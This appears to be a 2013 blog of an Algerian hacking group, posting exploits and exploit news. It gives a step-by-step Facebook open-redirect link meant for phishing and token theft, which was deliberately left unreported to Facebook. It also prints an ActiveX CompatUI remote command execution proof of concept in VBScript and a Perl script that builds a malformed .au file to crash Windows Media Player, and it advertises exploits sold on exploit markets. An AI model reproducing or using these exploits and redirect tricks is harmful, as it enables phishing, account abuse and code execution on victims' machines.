lundi 18 novembre 2013

Facebook open URL redirection vulnerability


Algerian Security Researcher "Asesino04" The Black Devils discovered an open URL redirection vulnerability in facebook that allowed attacker to have a facebook.com link edirect to any website without "Leave facebook" comment from facebook

This kind of  vulnerability is used to trick the victime by clicking on a trusted link whcih is designed to lead the victime to a malcious website .

Also this  vulnerability speacially if it was used to make a redirection on third part application can allowed attcker to steal the access token [Oauth Bug] which is very critical and dangerous .


The Founde of the exploit who is a member also in 1337DAY Team didn't report the bug to facebook


The vulnerability exists on the page where any person can download IOS or Android Sdk
You go to :
and you copy the link of "download sdk"
# you keep only this 
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=

# then you add to it 
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

#so it became like that : 

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
then it got redirect
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

:)
The Bug have  full discolure
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection

A proof of Concept :




samedi 24 août 2013

Facebook Send Messages From Anyone 0day

A new exploit allowed the attacker to send PM from any facebook account without access to the victime account and also can send attachment
the exploit was published yesterday on 1337day.com
http://1337day.com/exploit/description/21151
the price of the exploit was 600$
the  message can't be detected by facebook
the video shows how to exploit it
 

and also there is another vedio show how to send attachment 


mercredi 17 juillet 2013

Windows7 Remote Desk Top denial of service vulnerability

An Algerian pentesting team "The Black Devils " discovered a bug in remote desktop on windows7 allowed an attacker to use a "DOS3 attck against victime Pc
the exploit wa published on Inj3ct0rs
and this is  a vedio explain the exploitation

the exploit is written in 2 languages [perl & python]
and also there is a module written in metasploit [ruby] but
 not bublished yet


jeudi 11 juillet 2013

Reported a Bug To facebook

yesterday when i was on facebook i discovered a bug on facebook , i reported it waiting for response

samedi 6 juillet 2013

AK-Fuzzer 1.0 Released

AK-Fuzzer 1.0 Released
=================
Ak-Fuzzer1.0 released today, and you can download it from here
https://github.com/Asesino04/AK-Fuzzer


this fuzzer is a double local & remote fuzzer ,but it's only a simple version and the creator will devellop it sonn as he can

jeudi 4 juillet 2013

RealPlayer 16.0.2.232 Multiple Vulnerabilities 0-Day

RealPlayer 16.0.2.232 is suffring from Multiple Vulnerabilities
An Algerian security researcher has found Multiple Vulnerabilities in real player the latest version and publishe it in black markt (120 $)
Real player is no longr safe cause this Vulnerabilities allowed an attacker to exécute a malcious code in Target computer , the Vulnerability is also written in msf module so it' easy to exploit using metasploit

lundi 24 juin 2013

CompatUI ActiveX Control <= Remote Command Execution

# Exploit Title: CompatUI ActiveX Control   <= Remote Command Execution
# Date: 26/02/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ remote ]
# Dork : [ n / a ]
# Type : Windows
# Tested on: Internet Explorer 6 + 7 on Win Xp SP2
# Special Thanks to Ness Oum El Bouaghi
 
 
</==========================>
 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
/=============================/>
 
  
 File:   C:\WINDOWS\system32\compatui.dll
 CLSID:  {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
 ProgID: COMPATUILib.ProgView
  
Class Util
GUID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
Number of Interfaces: 1
Default Interface: IUtil
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
 
 
 /==========> Regisers
EAX 00000000
ECX BBEF9920
EDX 00000083
EBX 00000000
ESP 0012D180
EBP 0012D1A0
ESI 0012D1BC
EDI 00000000
EIP 7C91EB94 ntdll.KiFastSystemCallRet
C 0  ES 81A6 32bit 0(0)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 9920 32bit 0(0)
S 0  FS 003B 32bit 7FFDD000(FFF)
T 0  GS 81A1 32bit 0(0)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -5.6808232650904289540e-3484
ST1 empty -UNORM 9654 00000000 F0499644
ST2 empty -UNORM C0FD 00000000 0012D6D8
ST3 empty 0.0000000146950918570e-4933
ST4 empty -UNORM 9644 00000000 00000000
ST5 empty -1.2922186488787218470e+2437
ST6 empty -1.3850745354512915700e+4024
ST7 empty -UNORM 9644 00000000 00000083
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
 
 
  
 / =========> Proof Of Concept
 ------------------------------
 <object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>
 <script language='vbscript'>
 compatUI.RunApplication 1, "calc.exe", 1
 </script>
  
 / ===========>

Windows Media Player All versions Crash Poc

# Title : Windows Media Player All versions crash Poc
# Date: 2013-01-12
# Author: The Black Devils
# Tested on: Windows XP SP2


  
 /
EAX FFFFFFFF
ECX 00000000
EDX 00000000
EBX 00ADBFD8
ESP 0136F0EC
EBP 0136F180
ESI FFFFFFFF
EDI 0015F132
EIP 7486E650 quartz.7486E650
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFAD000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty +UNORM 0060 00090000 7C92B298
ST1 empty 0.0000000000410746190e-4933
ST2 empty 3.2726130374756203670e-4932
ST3 empty -UNORM B424 00450000 00163A58
ST4 empty -UNORM B690 7C91EE18 0006B864
ST5 empty 3.2720890737608970010e-4932
ST6 empty 21.590885050374495790
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
/
  
  
AppName: wmplayer.exe    AppVer: 10.0.0.3802     ModName: quartz.dll
ModVer: 6.5.2600.2180    Offset: 000ee650
  
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";               
print "    |=======================================================|\n";
print "    |= [!] Name : Windows Media Player 10.0.0.3802 ||.au   =|\n";
print "    |= [!] Exploit : Memory Corruption                     =|\n";
print "    |= [!] Author  : The Black Devils                      =|\n";
print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
print "    |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC =
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00";
open(file , ">", "inj3ctor.au"); # Evil File au
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";
close(file);